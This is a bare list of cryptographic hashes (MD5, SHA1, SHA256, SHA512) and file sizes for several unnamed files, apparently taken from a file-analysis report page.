SHA1f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15
SHA25638684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5
SHA512471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f
-
Filesize
101KB
MD5c4f1b50e3111d29774f7525039ff7086
SHA157539c95cba0986ec8df0fcdea433e7c71b724c6
SHA25618df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
SHA512005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5
-
Filesize
669B
MD5f734588a7620c48021688d3c2940353a
SHA1c9b9aece48b4c134b838217426145fdd542f60e6
SHA25697a2ce9683de5c9e03331d22309b5348f45cf65e77b1f011ba3505e2deafafc6
SHA5120549dcc50347802c774078f6f9ecfec2b21b0c489aa8e96168ea12a2cec55169d4172baac13819a07686755697794f05ac5b75d554229faf268f9e64f54e2033
-
Filesize
32KB
MD534dfb87e4200d852d1fb45dc48f93cfc
SHA135b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641
SHA2562d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703
SHA512f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2